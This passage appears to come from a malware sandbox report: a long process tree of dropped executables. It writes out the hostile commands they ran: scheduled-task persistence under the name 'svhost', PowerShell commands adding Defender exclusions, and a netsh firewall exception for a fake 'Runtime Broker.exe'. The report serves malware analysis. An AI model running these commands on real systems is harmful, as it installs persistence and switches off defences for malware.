                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                        PID:752
                                                                                                        • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                          "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
                                                                                                          27⤵
                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                          PID:3344
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ecx3iWk012y7.bat" "
                                                                                                          27⤵
                                                                                                            PID:2980
                                                                                                            • C:\Windows\system32\chcp.com
                                                                                                              chcp 65001
                                                                                                              28⤵
                                                                                                                PID:2976
                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                ping -n 10 localhost
                                                                                                                28⤵
                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                • Runs ping.exe
                                                                                                                PID:1592
                                                                                                              • C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
                                                                                                                "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
                                                                                                                28⤵
                                                                                                                • Checks computer location settings
                                                                                                                • Executes dropped EXE
                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                PID:5096
                                                                                                                • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                  "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
                                                                                                                  29⤵
                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                  PID:2608
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\X9znXVNGb9Sh.bat" "
                                                                                                                  29⤵
                                                                                                                    PID:3768
                                                                                                                    • C:\Windows\system32\chcp.com
                                                                                                                      chcp 65001
                                                                                                                      30⤵
                                                                                                                        PID:1948
                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                        ping -n 10 localhost
                                                                                                                        30⤵
                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                        • Runs ping.exe
                                                                                                                        PID:2288
                                                                                                                      • C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
                                                                                                                        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
                                                                                                                        30⤵
                                                                                                                        • Checks computer location settings
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                        PID:2764
                                                                                                                        • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                          "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
                                                                                                                          31⤵
                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                          PID:3060
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iQKrJfeTOwmK.bat" "
                                                                                                                          31⤵
                                                                                                                            PID:1492
                                                                                                                            • C:\Windows\system32\chcp.com
                                                                                                                              chcp 65001
                                                                                                                              32⤵
                                                                                                                                PID:4848
                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                ping -n 10 localhost
                                                                                                                                32⤵
                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                • Runs ping.exe
                                                                                                                                PID:3760
                                                                                                                              • C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
                                                                                                                                "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
                                                                                                                                32⤵
                                                                                                                                • Checks computer location settings
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                PID:5888
                                                                                                                                • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                  "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
                                                                                                                                  33⤵
                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                  PID:5920
                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zB6CSBfBQyIS.bat" "
                                                                                                                                  33⤵
                                                                                                                                    PID:6028
                                                                                                                                    • C:\Windows\system32\chcp.com
                                                                                                                                      chcp 65001
                                                                                                                                      34⤵
                                                                                                                                        PID:6088
                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                        ping -n 10 localhost
                                                                                                                                        34⤵
                                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                        • Runs ping.exe
                                                                                                                                        PID:6108
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
                                                                                                                                        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
                                                                                                                                        34⤵
                                                                                                                                        • Checks computer location settings
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                        PID:2400
                                                                                                                                        • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                          "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
                                                                                                                                          35⤵
                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                          PID:5040
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1iytKINj1YAv.bat" "
                                                                                                                                          35⤵
                                                                                                                                            PID:2936
                                                                                                                                            • C:\Windows\system32\chcp.com
                                                                                                                                              chcp 65001
                                                                                                                                              36⤵
                                                                                                                                                PID:1836
                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                ping -n 10 localhost
                                                                                                                                                36⤵
                                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                • Runs ping.exe
                                                                                                                                                PID:2316
                                                                                                                                              • C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
                                                                                                                                                "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
                                                                                                                                                36⤵
                                                                                                                                                • Checks computer location settings
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                PID:700
                                                                                                                                                • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                  "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
                                                                                                                                                  37⤵
                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                  PID:2900
                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ONFIIb2W1Pb9.bat" "
                                                                                                                                                  37⤵
                                                                                                                                                    PID:5152
                                                                                                                                                    • C:\Windows\system32\chcp.com
                                                                                                                                                      chcp 65001
                                                                                                                                                      38⤵
                                                                                                                                                        PID:5240
                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                        ping -n 10 localhost
                                                                                                                                                        38⤵
                                                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                        • Runs ping.exe
                                                                                                                                                        PID:5252
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
                                                                                                                                                        38⤵
                                                                                                                                                        • Checks computer location settings
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                        PID:5440
                                                                                                                                                        • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                          "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
                                                                                                                                                          39⤵
                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                          PID:5472
                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\89RWZsruzKro.bat" "
                                                                                                                                                          39⤵
                                                                                                                                                            PID:5592
                                                                                                                                                            • C:\Windows\system32\chcp.com
                                                                                                                                                              chcp 65001
                                                                                                                                                              40⤵
                                                                                                                                                                PID:5640
                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                ping -n 10 localhost
                                                                                                                                                                40⤵
                                                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                PID:5356
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
                                                                                                                                                                40⤵
                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                PID:3080
                                                                                                                                                                • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                                  "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
                                                                                                                                                                  41⤵
                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                  PID:4960
                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YaN2OlYpXMsJ.bat" "
                                                                                                                                                                  41⤵
                                                                                                                                                                    PID:2732
                                                                                                                                                                    • C:\Windows\system32\chcp.com
                                                                                                                                                                      chcp 65001
                                                                                                                                                                      42⤵
                                                                                                                                                                        PID:5236
                                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                                        ping -n 10 localhost
                                                                                                                                                                        42⤵
                                                                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                        PID:5396
                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
                                                                                                                                                                        42⤵
                                                                                                                                                                        • Checks computer location settings
                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                        PID:2096
                                                                                                                                                                        • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                                          "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
                                                                                                                                                                          43⤵
                                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                          PID:5592
                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8EQFTb4doBXq.bat" "
                                                                                                                                                                          43⤵
                                                                                                                                                                            PID:2544
                                                                                                                                                                            • C:\Windows\system32\chcp.com
                                                                                                                                                                              chcp 65001
                                                                                                                                                                              44⤵
                                                                                                                                                                                PID:5280
                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                ping -n 10 localhost
                                                                                                                                                                                44⤵
                                                                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                                PID:5148
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
                                                                                                                                                                                44⤵
                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                PID:6140
                                                                                                                                                                                • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                                                  "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
                                                                                                                                                                                  45⤵
                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                  PID:3684
                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wgywlNOzwy9o.bat" "
                                                                                                                                                                                  45⤵
                                                                                                                                                                                    PID:5348
                                                                                                                                                                                    • C:\Windows\system32\chcp.com
                                                                                                                                                                                      chcp 65001
                                                                                                                                                                                      46⤵
                                                                                                                                                                                        PID:1976
                                                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                                                        ping -n 10 localhost
                                                                                                                                                                                        46⤵
                                                                                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                                        PID:2968
                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
                                                                                                                                                                                        46⤵
                                                                                                                                                                                        • Checks computer location settings
                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                        PID:5552
                                                                                                                                                                                        • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                                                          "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
                                                                                                                                                                                          47⤵
                                                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                          PID:1688
                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ou73wzZ3ih8R.bat" "
                                                                                                                                                                                          47⤵
                                                                                                                                                                                            PID:2364
                                                                                                                                                                                            • C:\Windows\system32\chcp.com
                                                                                                                                                                                              chcp 65001
                                                                                                                                                                                              48⤵
                                                                                                                                                                                                PID:5388
                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                ping -n 10 localhost
                                                                                                                                                                                                48⤵
                                                                                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                                                PID:5136
                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
                                                                                                                                                                                                48⤵
                                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                PID:3168
                                                                                                                                                                                                • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                                                                  "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
                                                                                                                                                                                                  49⤵
                                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                  PID:4276
                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Eh9kkNx3Alx9.bat" "
                                                                                                                                                                                                  49⤵
                                                                                                                                                                                                    PID:6024
                                                                                                                                                                                                    • C:\Windows\system32\chcp.com
                                                                                                                                                                                                      chcp 65001
                                                                                                                                                                                                      50⤵
                                                                                                                                                                                                        PID:5040
                                                                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                        ping -n 10 localhost
                                                                                                                                                                                                        50⤵
                                                                                                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                                                        PID:3032
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
                                                                                                                                                                                                        50⤵
                                                                                                                                                                                                          PID:3732
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Files\23c2343.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Files\23c2343.exe"
                                                                                                            3⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:1796
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Files\yxrd0ob7.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Files\yxrd0ob7.exe"
                                                                                                            3⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious use of SetThreadContext
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:5048
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Files\yxrd0ob7.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Files\yxrd0ob7.exe"
                                                                                                              4⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:3020
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Files\yxrd0ob7.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Files\yxrd0ob7.exe"
                                                                                                              4⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:3796
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5048 -s 288
                                                                                                              4⤵
                                                                                                              • Program crash
                                                                                                              PID:4712
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Files\GoodFrag.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Files\GoodFrag.exe"
                                                                                                            3⤵
                                                                                                            • Checks computer location settings
                                                                                                            • Executes dropped EXE
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:1588
                                                                                                            • C:\Users\Admin\AppData\Roaming\Runtime Broker.exe
                                                                                                              "C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"
                                                                                                              4⤵
                                                                                                              • Drops startup file
                                                                                                              • Executes dropped EXE
                                                                                                              • Adds Run key to start application
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:436
                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Runtime Broker.exe" "Runtime Broker.exe" ENABLE
                                                                                                                5⤵
                                                                                                                • Modifies Windows Firewall
                                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                • System Time Discovery
                                                                                                                PID:1668
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Files\System.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Files\System.exe"
                                                                                                            3⤵
                                                                                                            • Checks computer location settings
                                                                                                            • Executes dropped EXE
                                                                                                            • Adds Run key to start application
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            • Modifies registry class
                                                                                                            PID:2188
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Files\._cache_System.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Files\._cache_System.exe"
                                                                                                              4⤵
                                                                                                              • Checks computer location settings
                                                                                                              • Drops startup file
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:916
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\._cache_System.exe'
                                                                                                                5⤵
                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                PID:3600
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '._cache_System.exe'
                                                                                                                5⤵
                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                PID:1296
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System.exe'
                                                                                                                5⤵
                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                PID:1236
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System.exe'
                                                                                                                5⤵
                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                PID:1464
                                                                                                            • C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                                                                              4⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:4744
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Files\maza-0.16.3-win32-setup-unsigned.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Files\maza-0.16.3-win32-setup-unsigned.exe"
                                                                                                            3⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Loads dropped DLL
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:2192
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Files\test10.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Files\test10.exe"
                                                                                                            3⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:3036
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Files\Server.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Files\Server.exe"
                                                                                                            3⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Adds Run key to start application
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            • Suspicious behavior: GetForegroundWindowSpam
                                                                                                            PID:3184
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Files\NoMoreRansom.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Files\NoMoreRansom.exe"
                                                                                                            3⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Adds Run key to start application
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            PID:1676
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Files\Eszop.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Files\Eszop.exe"
                                                                                                            3⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:3204
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Files\LicenseMalwareBytes.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Files\LicenseMalwareBytes.exe"
                                                                                                            3⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:5296
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Files\LicenseMalwareBytes.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Files\LicenseMalwareBytes.exe"
                                                                                                              4⤵
                                                                                                              • Drops file in Drivers directory
                                                                                                              • Executes dropped EXE
                                                                                                              • Loads dropped DLL
                                                                                                              PID:5644
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c gpupdate /force
                                                                                                                5⤵
                                                                                                                  PID:5676
                                                                                                                  • C:\Windows\system32\gpupdate.exe
                                                                                                                    gpupdate /force
                                                                                                                    6⤵
                                                                                                                      PID:5692
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Files\zzzz1.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Files\zzzz1.exe"
                                                                                                                3⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                PID:5844
                                                                                                                • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                  "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                                                                  4⤵
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  PID:3000
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Files\major.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Files\major.exe"
                                                                                                                3⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                PID:1928
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Files\Ewpeloxttug.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Files\Ewpeloxttug.exe"
                                                                                                                3⤵
                                                                                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                • Drops startup file
                                                                                                                • Executes dropped EXE
                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                PID:5960
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Files\RuntimeBroker.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Files\RuntimeBroker.exe"
                                                                                                                3⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:3864
                                                                                                                • C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
                                                                                                                  "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
                                                                                                                  4⤵
                                                                                                                  • Checks computer location settings
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:2900
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TH4j0n3yiGSw.bat" "
                                                                                                                    5⤵
                                                                                                                      PID:3764
                                                                                                                      • C:\Windows\system32\chcp.com
                                                                                                                        chcp 65001
                                                                                                                        6⤵
                                                                                                                          PID:5128
                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                          ping -n 10 localhost
                                                                                                                          6⤵
                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                          • Runs ping.exe
                                                                                                                          PID:1864
                                                                                                                        • C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
                                                                                                                          "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
                                                                                                                          6⤵
                                                                                                                          • Checks computer location settings
                                                                                                                          PID:1656
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\txmeSsWzYSYt.bat" "
                                                                                                                            7⤵
                                                                                                                              PID:5044
                                                                                                                              • C:\Windows\system32\chcp.com
                                                                                                                                chcp 65001
                                                                                                                                8⤵
                                                                                                                                  PID:5568
                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                  ping -n 10 localhost
                                                                                                                                  8⤵
                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                  • Runs ping.exe
                                                                                                                                  PID:1008
                                                                                                                                • C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
                                                                                                                                  8⤵
                                                                                                                                  • Checks computer location settings
                                                                                                                                  PID:2092
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\U534SfqX8nsF.bat" "
                                                                                                                                    9⤵
                                                                                                                                      PID:5656
                                                                                                                                      • C:\Windows\system32\chcp.com
                                                                                                                                        chcp 65001
                                                                                                                                        10⤵
                                                                                                                                          PID:1072
                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                          ping -n 10 localhost
                                                                                                                                          10⤵
                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                          • Runs ping.exe
                                                                                                                                          PID:3764
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
                                                                                                                                          10⤵
                                                                                                                                          • Checks computer location settings
                                                                                                                                          PID:5540
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tVJhbw5WFusW.bat" "
                                                                                                                                            11⤵
                                                                                                                                              PID:5592
                                                                                                                                              • C:\Windows\system32\chcp.com
                                                                                                                                                chcp 65001
                                                                                                                                                12⤵
                                                                                                                                                  PID:6024
                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                  ping -n 10 localhost
                                                                                                                                                  12⤵
